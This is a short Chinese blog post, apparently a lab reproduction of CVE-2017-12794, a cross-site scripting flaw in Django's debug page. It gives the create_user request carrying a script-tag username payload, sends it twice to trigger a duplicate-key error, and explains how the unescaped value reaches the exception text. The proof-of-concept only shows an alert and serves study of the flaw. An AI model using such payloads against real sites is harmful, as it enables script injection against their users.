Django debug page XSS漏洞(CVE-2017-12794)

时间:2020-02-24 18:29:59   收藏:0   阅读:86
1.创建个用户:ip:8000/create_user/?username=<script>alert(7)</script>

技术分享图片

显示用户已创建。
2.触发漏洞,再次访问ip:8000/create_user/?username=<script>alert(7)</script>

技术分享图片

3.触发异常:

duplicate key value violates unique constraint "xss_user_username_key"
DETAIL: Key (username)=(<script>alert(7)</script>) already exists.

技术分享图片

4.这个异常被拼接进The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception,最后触发XSS。

原文:https://blog.51cto.com/14259169/2473184

评论(0
© 2014 bubuko.com 版权所有 - 联系我们:wmxa8@hotmail.com
打开技术之扣,分享程序人生!